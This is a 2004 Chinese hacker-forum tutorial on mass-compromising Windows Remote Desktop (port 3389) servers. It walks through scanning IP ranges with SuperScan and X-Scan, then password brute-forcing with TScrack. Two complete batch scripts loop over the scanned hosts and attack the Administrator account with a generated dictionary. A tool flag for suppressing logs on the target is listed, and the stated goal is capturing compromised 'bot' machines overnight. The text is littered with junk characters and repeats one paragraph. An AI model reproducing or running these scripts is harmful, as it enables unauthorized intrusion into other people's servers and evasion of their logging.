|
作者:霜风 QQ:14226581 3 t" C1 z2 W6 R6 ~: c" `/ X( s
终端服务又称3389服务,它提供了通过作为终端仿真器工作的“瘦客户机”软件远程访问服务器桌面的能力。终端服务只把该程序的用户界面传给客户机。客户机然后返回键盘和鼠标单击动作,以便由服务器处理。每个用户都只能登录并看到它们自己的会话,这些会话由服务器操作系统透明地进行管理,而且与任何其他客户机会话无关。客户软件可以运行在多个客户机硬件设备上,包括计算机和基于 Windows 的终端。其他设备,如 Macintosh 计算机或基于 UNIX 的工作站,也可以使用其他第三方的软件连接到终端服务器。0 Z. d5 X" _6 G8 P
这样的服务因为操作简便和功能强大而著称,深受广大管理员和黑友们的欢迎,其实这个题目在很早以前就有前辈写过,但适值今日,那个老方法成功率已经越老越低了,为什么呢?要我先把前辈们的方法概述一下: w8 b6 A; ~4 o2 c1 [
首先用superscan把所有开3389的主机都扫下来,接着用x-scan扫他们的弱口令,具体方法如下:- x- _1 J9 |7 u! H4 U% y A
先打开superscan3如图1
+ v: J+ o1 x w7 v' Y4 L& H# j( w- J/ S# Q9 n2 V
此主题相关图片如下:! l; n/ ?7 m" `
9 C4 G, B9 a0 B1 v2 R
5 K/ E; E% u% ]
接着输入其实IP和终止IP,填好以后在把“所有端口定义”的两个空改为3389,接着把左边的速度调到最快,最后点开始,进度条走完以后,点删除,整理点展开所有以后如图2$ B8 h! ^) ~7 p6 Q4 [
5 c9 l8 v$ N2 j. d9 p$ c' Z此主题相关图片如下:
0 p9 P/ {1 d: f( c2 y+ h$ O% u B" {7 o
. c6 l9 f0 w& S0 Z, \然后点保存,接着打开保存的文件,把所有的“* + ”和“|___ 3389”都删除.
5 f8 Y F% V* b- f! e这里告诉大家一个小技巧,进入—替换—在查找内容把“* +”填上,然后点全部替换如图30 u$ T& H9 Y% f5 x" [/ {/ {0 v$ s
( T( H) \" k7 }$ u
此主题相关图片如下:
! n) e; ~* Z' e1 Q2 Y @' b) v3 g: Q8 c
( o; B+ V; |' r, d' u- x# O
4 u; @8 i- C; p4 r: t7 F“|___ 3389”的删除方法如上,最后输入空格,把空格替换掉,整理完毕后如图4。) v1 N3 E8 j8 f# x
! M2 Z& ]& x s0 [
此主题相关图片如下:+ z8 ~: W' e% n( Z5 g1 v; j
) D, M" X8 j+ J+ ?# Y' `接着打开X-SCAN,进入—设置—扫描参数,把从“从文件获取主机列表”打上勾,选上刚刚整理的文件后如图53 \: r1 m, h1 P) S, d
' B- [/ G s6 @: t
此主题相关图片如下:
8 {/ W6 W7 N/ i0 r
' m+ o$ F$ B' j2 b进入“扫描模块”只把两项打上勾:"NT-server弱口令""sql-server弱口令”,OK后就点绿箭头开始了,这种方法在以前是非常有效的,一天搞几十个不是问题,但现在许多用管理员已经把139后445的端口封了,这样就不能得到netbios信息了,X-SCAN也就不能扫NT若口令了,对付XP更是束手无策,SQL-SERVER若口令更加如大海落针,读者们肯定又要问了,我们到底怎么办呢?别急,我马上娓娓到来。 k1 M W( p, z9 Z
所需工具:TScrack.exe所需工具:TScrack.exe,一个记事本。
4 C3 _8 H9 n B3 T# ZTScrack.exe是针对终端服务的一个密码破解程序.这个程序被微软推荐给用户使用,来检查终端服务密码的强壮性.程序使用msrdp控件,可在本地虚拟远程终端连接窗口,通过密码字典进行破解. 可以指定多种参数,使用比较灵活,破解速度视攻击主机与被攻击主机网络带宽而变化.,一个记事本。
) U9 \; P; f; F% J. l- Y此软件可以只利用3389服务的登陆框猜解密码,不再以来原先的139端口了,废话少说来看具体操作。- p$ D2 R! Q V, h' y) L* D- _
在CMD下启动TScrack.exe,会首先分离出main_scraper.nnt,MSRDP.OCX,MSWINSCK.OCX这几个文件,然后就可以正常运行了,TScrack.exe一共有这几个选项:7 V( M/ ^$ y2 h2 a8 U
-h : Print usage help and exit
; _/ J, Z# H1 ~0 X: C/ H-V : Print version info and exit
' p* u% X" e# q7 {-s : Print chipher strenght info and exit5 a% u+ {% h) `: H) g; ?3 c$ [1 x
-b : Enable failed password beep. X/ v) Z% n( \# j# z8 m& e
-t : Use two simultaneous connections [EXPERIMENTAL]4 n/ V/ O% r: J+ z/ d% i
-N : Prevent System Log entries on targeted server
9 f# F2 w7 I' ~3 w: K9 U-U : Uninstall tscrack and remove components( F9 J% C% y2 K4 Q+ u' {
-f <number> : Wordlist entry to start cracking with" S) q( x2 E1 n: {
-F <delay> : Sampling Frequency (Delay between samples in ms)
" b- \) l; B, R8 Z2 L-l <user> : Account name to use, defaults to Administrator
; v0 j* Y9 d5 b) ?5 N8 h0 l& G1 v-w <wordlist> : Wordlist to use; tscrack tries blank passes if omitted/ ?8 o L6 E2 [0 N4 G' I/ L
-p <password> : Use <password> to logon instead of wordlist/blank pass( r: P; W9 M( z1 A; Q0 g9 c
-D <domain> : Specify domain to attempt logon to
. c# y& p/ K4 z& O, o
# ^4 {$ E; q, k4 N- n
$ y! {+ L% q0 P7 Y4 q9 L0 m我就帮忙翻译一下吧,翻译得不好可不要怪我啊:
# `- l! E3 d8 W8 e-h : 显示使用帮助然后退出4 ?- [/ \: k- u" `
-V : 显示版本信息然后退出
d/ `& `' e+ d; n-s : 显示 chipher strenght信息然后退出(chipher strenght具体意思不明)+ z- q# x" Y6 L; P8 F
-b : 密码错误时发出声音4 m1 A5 ~6 I) m
-t : 同时发出多个连接,就是多线程。 n* y; D' x7 E6 U0 j
-N : Prevent System Log entries on targeted server- U1 A1 I& c3 `0 h+ X1 }" B+ e
-U : 卸载移除tscrack组件。& ~5 ~% h) L7 a9 f3 Q6 J
-f <number> : 使用-F后面的密码。) t4 L& j3 X4 V5 y; u4 N
-F <delay> : 间隔时间(频率)
9 g5 @8 W/ o o6 [! b3 m z( s) S-l <user> : 使用-L后面的用户名0 N- W3 ]- t6 K4 o- `& n+ E: h! o9 Z
-w <wordlist> : 使用-W后面的字典+ Y' u- u" {( }: i. i
-p <password> : 使用-W后的密码! n! ^. Q4 ]5 r( ~" `& f
-D <domain> : 登陆主页面?# B& C3 F' K. E8 X1 X8 r6 D
相信通过上面的功能介绍,大家对TScrack.exe都应该有所了解了吧,下面就是实例操作了,首先就是用SUPERSCAN把3389机扫下来吧,整理后保存,IP数一般在100个左右,保存好后,就用记事本写一段BAT了名字为3389,把下面的代码写入记事本:
) l9 G- c- F* ^0 C* T4 W@if not exist IpcScan.txt goto noscan2 g1 v" Z; T( @: ^" K+ }
@for /f "tokens=1 delims= " %%i in (3389.txt) do call hack.bat %%i
; q8 ~! Z- k5 v4 h( Z:noscan( Y1 y4 F% e' Q5 S/ p
@echo 3389.txt no find or scan faild 
9 [" l' [3 m/ Z$ j6 u3 Y, I2 [这段代码的大概意思是从3389.txt(刚刚用SUPERSCAN保存后的文件)里取一段字符,接着运行hack 这段字符(也就是IP)" Z; G8 d8 `2 c# [5 F
保存后把后错名改为BAT就可以了。
+ m) a+ m& g1 C9 {0 ]还写一个BAT,名字为HACK.BAT,代码如下:
# Y4 N: @4 C+ R' t8 j5 C! i5 F# E@if not exist tscrack.exe goto noscan
; g2 r( q/ M5 i8 z. |@tscrack %1 -l administartor -w pass.dic >>rouji.txt
. s! G- N! r/ ~1 _, Q; }; g:noscan
" |$ ]5 x, G1 [; n; T/ K [@echo tscrack.exe no find or scan faild
3 L( c& F( x$ X5 D% H: o, I& x) B: I这段代码的意思是:运行tscrack,用户名为administrator 字典文件为PASS.DIC
9 f! t& @7 n& \7 c8 \制作方法如上。
$ m0 e9 c$ L0 @! t3 N% `然后就是制作字典了,制作字典最关键的就是选一个好的字典工具,我这里选择了"万能钥匙"这个字典生成器,虽然是老了一点,但功能绝对是所有字典里最强大的,唯一的缺点就是不能使用基本字符定义,不过其他功能还是很不错,界面如图62 E5 E; a# Z! h& U2 H, x) l8 @
/ O" E5 N6 L( l' b& V p此主题相关图片如下:
$ _" o% o* q. t, _怎么配置网上有许多这方面的文章,读者们可以自己去研究,这里要注意的是密码数应该保持在2000左右,最好在万能钥匙的倒数第二步里选择常用的一些数字和英文,自己再加一点,例如:5201314,12345678等等,配置完成以后保存为PASS.dic.3 f: N" x4 p% c3 _3 _, Z
最后把3389.TXT,3389.BAT,HACK.BAT,PASS.DIC以及TSCRACK所有的文件放在一个文件夹里,最后就是启动3389.BAT如图75 s& o4 d0 X0 K' r8 \0 a
V8 W, p) s/ g$ s3 @7 t- e
此主题相关图片如下:; w2 q- B3 `( ?: A; L* ^$ V
" O9 }* t4 O. ] z9 v! a% }怎么配置网上有许多这方面的文章,读者们可以自己去研究,这里要注意的是密码数应该保持在2000左右,最好在万能钥匙的倒数第二步里选择常用的一些数字和英文,自己再加一点,例如:5201314,12345678等等,配置完成以后保存为PASS.dic.
; K/ L- H" I7 f最后把3389.TXT,3389.BAT,HACK.BAT,PASS.DIC以及TSCRACK所有的文件放在一个文件夹里,最后就是启动3389.BAT如图7,接下来做的事就是等待了,及结果保存在ROUJI.TXT里,放在肉鸡上一晚上搞10来个极品肉鸡都有可能,也欢迎大家与我交流~ | 
IP卡
狗仔卡
发表于 2004-10-6 09:51
转播
淘帖
分享
收藏
支持
反对
微信
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
抢沙发
显身卡
